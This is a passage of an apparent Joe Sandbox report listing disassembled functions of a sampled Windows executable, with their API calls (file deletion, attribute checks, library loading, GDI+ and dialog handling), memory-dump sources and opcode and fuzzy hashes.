                                                                                                • Part of subcall function 00C6BB03: _wcslen.LIBCMT ref: 00C6BB27
                                                                                              • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00C6977F,?,?,00C695CF,?,?,?,?,?,00C92641), ref: 00C6A21F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2643169976-0
                                                                                              • Opcode ID: e5309a56c8b5f40f07f0db6816c89260927f217f7f3505bf294052a37f49e376
                                                                                              • Instruction ID: de0d62ba8a9c4d2879e408ab229edb2f93b23f7d7dad0a157415753170bf9b8e
                                                                                              • Opcode Fuzzy Hash: e5309a56c8b5f40f07f0db6816c89260927f217f7f3505bf294052a37f49e376
                                                                                              • Instruction Fuzzy Hash: 0AE0D8351402496BEB115F60DC86FDD375CAF0C3C5F484061B948E2050EB71DEC4EE54
                                                                                              Function 00C7AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,00C92641,000000FF), ref: 00C7ACB0
                                                                                              • CoUninitialize.COMBASE(?,?,?,?,00C92641,000000FF), ref: 00C7ACB5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: GdiplusShutdownUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 3856339756-0
                                                                                              • Opcode ID: 0f4eb903d03df83f417fbcb855f6ad72e9596b3b6d702d967fb04d1db88670f3
                                                                                              • Instruction ID: d54423402b65c66d2644e9b893b675a687eacb95521dc5004e7f4a4b049eced5
                                                                                              • Opcode Fuzzy Hash: 0f4eb903d03df83f417fbcb855f6ad72e9596b3b6d702d967fb04d1db88670f3
                                                                                              • Instruction Fuzzy Hash: D1E06D72604A50EFCB009B58DC0AB49FBA8FB89B20F04426AF416D37A0CB74A800CA94
                                                                                              Function 00C6A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00C6A23A,?,00C6755C,?,?,?,?), ref: 00C6A254
                                                                                                • Part of subcall function 00C6BB03: _wcslen.LIBCMT ref: 00C6BB27
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00C6A23A,?,00C6755C,?,?,?,?), ref: 00C6A280
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2673547680-0
                                                                                              • Opcode ID: 320ea8068881ecedfcdf3528f82e34fb5dc81eb20c7ea5c6eb13d7c37aa252aa
                                                                                              • Instruction ID: 8d409fac6d0d2c6295c150b76640a3fe8d1fd9cdf3db6628a7d1ab94c279a934
                                                                                              • Opcode Fuzzy Hash: 320ea8068881ecedfcdf3528f82e34fb5dc81eb20c7ea5c6eb13d7c37aa252aa
                                                                                              • Instruction Fuzzy Hash: 78E092365001245BCB21AB64CC49BD97B58AB083E1F044261FD58E3190D770DE84CAA0
                                                                                              Function 00C7DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 00C7DEEC
                                                                                                • Part of subcall function 00C64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C640A5
                                                                                              • SetDlgItemTextW.USER32(00000065,?), ref: 00C7DF03
                                                                                                • Part of subcall function 00C7B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00C7B579
                                                                                                • Part of subcall function 00C7B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C7B58A
                                                                                                • Part of subcall function 00C7B568: IsDialogMessageW.USER32(00010414,?), ref: 00C7B59E
                                                                                                • Part of subcall function 00C7B568: TranslateMessage.USER32(?), ref: 00C7B5AC
                                                                                                • Part of subcall function 00C7B568: DispatchMessageW.USER32(?), ref: 00C7B5B6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 2718869927-0
                                                                                              • Opcode ID: 410cf2a883ffea5a3e64d09ec19f7231aa293a536bd55ffe1791b60721b8c857
                                                                                              • Instruction ID: c1e8590c2cf23f4fa4dd6ede82390cdc0316ea14362720238b76f270433b1e64
                                                                                              • Opcode Fuzzy Hash: 410cf2a883ffea5a3e64d09ec19f7231aa293a536bd55ffe1791b60721b8c857
                                                                                              • Instruction Fuzzy Hash: A3E0D8B64003486BDF12BB64DC0AFDE3B6C5B09789F044851B205DB0F3EA78EE149761
                                                                                              Function 00C7081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00C70836
                                                                                              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00C6F2D8,Crypt32.dll,00000000,00C6F35C,?,?,00C6F33E,?,?,?), ref: 00C70858
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryLibraryLoadSystem
                                                                                              • String ID:
                                                                                              • API String ID: 1175261203-0
                                                                                              • Opcode ID: 8bd9e9dd4c84635c1db7ff1f26134d4ca60d5895a6d954853c348d1f056bc7d0
                                                                                              • Instruction ID: 4d9bac4502fd5ca0d47e880f7ae8ea2b6c923567e4223027274a6d7b83988776
                                                                                              • Opcode Fuzzy Hash: 8bd9e9dd4c84635c1db7ff1f26134d4ca60d5895a6d954853c348d1f056bc7d0
                                                                                              • Instruction Fuzzy Hash: ADE01A76800168AADB11ABA49C49FDA7BACAF09395F0440A6B649E2044DB74DA84CBA0
                                                                                              Function 00C7A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00C7A3DA
                                                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00C7A3E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: BitmapCreateFromGdipStream
                                                                                              • String ID:
                                                                                              • API String ID: 1918208029-0
                                                                                              • Opcode ID: 76815c2fb2464be5eec183425867ceef881ebb4c7558980794144be938036fdd
                                                                                              • Instruction ID: dae4da4cd36db8831652333103d82fe9d6374d6f2253759066fb3ba0506f4fba
                                                                                              • Opcode Fuzzy Hash: 76815c2fb2464be5eec183425867ceef881ebb4c7558980794144be938036fdd
                                                                                              • Instruction Fuzzy Hash: B3E0ED72504218EBCB10DF95C545A9DBBE8EB08364F10C05AA85A93211E374AE04DB91
                                                                                              Function 00C82B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C82BAA
                                                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00C82BB5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                              • String ID:
                                                                                              • API String ID: 1660781231-0
                                                                                              • Opcode ID: 34a3b8b710c9a830498d36ff69c958d2e0d340a08bf90609577ad586dcf91e1b
                                                                                              • Instruction ID: 9d64792d0858a5ab06609abecd0ea3b4fcaf83a031dae83718bad94e6671ef4b
                                                                                              • Opcode Fuzzy Hash: 34a3b8b710c9a830498d36ff69c958d2e0d340a08bf90609577ad586dcf91e1b
                                                                                              • Instruction Fuzzy Hash: 5BD022341663002A8C187EB0680FEB833C5AD51F7D7A067BBF833854C1EE108180B32E
                                                                                              Function 00C612F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemShowWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3351165006-0
                                                                                              • Opcode ID: 3244f0a93e340925c03ed1b40737b26d6a48b2bbb1a7ad0f588e62e5e6b1fcdd
                                                                                              • Instruction ID: 4f7aa86dd380080fa10be5cc3485c52470d7b771f8181fc89cec97273a8d1e87
                                                                                              • Opcode Fuzzy Hash: 3244f0a93e340925c03ed1b40737b26d6a48b2bbb1a7ad0f588e62e5e6b1fcdd
                                                                                              • Instruction Fuzzy Hash: 04C0127225C280BECB011BB4EC09E2FBBB8EBA5312F08C908F0A5C0060C238C110DB11
                                                                                              Function 00C61A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 87f2ae3b1e6c22bd3e512633e34c43b67838f2e22ccdaf6569d0b2a2f0c5a08a
                                                                                              • Instruction ID: 14a9a71ebf1c499e9f2c36b6ab723ff15d9517e708efae596d3b275582bcff62
                                                                                              • Opcode Fuzzy Hash: 87f2ae3b1e6c22bd3e512633e34c43b67838f2e22ccdaf6569d0b2a2f0c5a08a
                                                                                              • Instruction Fuzzy Hash: 8DC1AF70A00254AFEF25CF68C4C8BAD7BA5AF55311F0C01BAEC56DB396DB309A44CB61
                                                                                              Function 00C63BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: c5cf9aeda50c5ddee666c2a59246a2b2a270ca0700023a1632cb2b73d8ac6723
                                                                                              • Instruction ID: 1d30d9231a044717ebfb8dcf590c8fee8149157bde03fd4f9941dba0b1f4732a
                                                                                              • Opcode Fuzzy Hash: c5cf9aeda50c5ddee666c2a59246a2b2a270ca0700023a1632cb2b73d8ac6723
                                                                                              • Instruction Fuzzy Hash: 4B71C571500B849EDB35DB70C8959E7B7E9AF14301F44492EF6AB87242DA327A44EF21
                                                                                              Function 00C68284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00C68289
                                                                                                • Part of subcall function 00C613DC: __EH_prolog.LIBCMT ref: 00C613E1
                                                                                                • Part of subcall function 00C6A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00C6A598
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog$CloseFind
                                                                                              • String ID:
                                                                                              • API String ID: 2506663941-0
                                                                                              • Opcode ID: 80e4646ba107c1c2270611d067546f7511d50ca12ecbe30da05764a67e9de3d4
                                                                                              • Instruction ID: d56770fbe6358a06d957340403b51b673347aac947750ea086193613612a8d5f
                                                                                              • Opcode Fuzzy Hash: 80e4646ba107c1c2270611d067546f7511d50ca12ecbe30da05764a67e9de3d4
                                                                                              • Instruction Fuzzy Hash: B441C7719446589ADB30DBA0CC95AFAB3B8AF04304F0405FAE59A97193EF715FC9DB10
                                                                                              Function 00C613E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00C613E1
                                                                                                • Part of subcall function 00C65E37: __EH_prolog.LIBCMT ref: 00C65E3C
                                                                                                • Part of subcall function 00C6CE40: __EH_prolog.LIBCMT ref: 00C6CE45
                                                                                                • Part of subcall function 00C6B505: __EH_prolog.LIBCMT ref: 00C6B50A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: cfa4b0099fb11c3b6604f6c75a6b437bb96df298815d03098906f9f17e1fc4ef
                                                                                              • Instruction ID: a3934c00517ec634c76fba5266a0fa2b13b11dc1e43d3399d77b4a86bed6baf7
                                                                                              • Opcode Fuzzy Hash: cfa4b0099fb11c3b6604f6c75a6b437bb96df298815d03098906f9f17e1fc4ef
                                                                                              • Instruction Fuzzy Hash: 9A4138B0905B409EE724DF798885AE6FBE5BF19300F54492EE5FF87282CB326654DB10
                                                                                              Function 00C613DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00C613E1
                                                                                                • Part of subcall function 00C65E37: __EH_prolog.LIBCMT ref: 00C65E3C
                                                                                                • Part of subcall function 00C6CE40: __EH_prolog.LIBCMT ref: 00C6CE45
                                                                                                • Part of subcall function 00C6B505: __EH_prolog.LIBCMT ref: 00C6B50A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 35295b2b6b8e11e2d227a8ef5f63fac687b14ad3b6ae7f84972b7506d65c2cb5
                                                                                              • Instruction ID: 3d530c74da6016e72e69cd53495a86eb1fd6f3872e44e1b6bc7acbe59aa142e1
                                                                                              • Opcode Fuzzy Hash: 35295b2b6b8e11e2d227a8ef5f63fac687b14ad3b6ae7f84972b7506d65c2cb5
                                                                                              • Instruction Fuzzy Hash: 724137B0905B409EE724DF798885AE6FBE5BF19300F54492ED5FF83282CB326654DB10
                                                                                              Function 00C7B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00C7B098
                                                                                                • Part of subcall function 00C613DC: __EH_prolog.LIBCMT ref: 00C613E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: c00936d4f017deb57becf5fd8e6c3719e2a5533b1a43275c37670d5fd11eecf7
                                                                                              • Instruction ID: 3343388cfaa9ffff033aaf9bc7d2b31cbf78933766fe60bca6fdc2bbb596389f
                                                                                              • Opcode Fuzzy Hash: c00936d4f017deb57becf5fd8e6c3719e2a5533b1a43275c37670d5fd11eecf7
                                                                                              • Instruction Fuzzy Hash: BA317E75C00249DBCF25DF65C891AEEBBB4AF09304F54449EE809B7242DB35AF04DB61
                                                                                              Function 00C8AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetProcAddress.KERNEL32(00000000,00C93A34), ref: 00C8ACF8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc
                                                                                              • String ID:
                                                                                              • API String ID: 190572456-0
                                                                                              • Opcode ID: a67e1ea2ce69b17e1947db97ab4e6f0962c5125d9ecdb5d19a2e4f00662afb2d
                                                                                              • Instruction ID: e073934e37a6ed1292e02f10566009a02f3466378be5ca9ecd475840d8c217b5
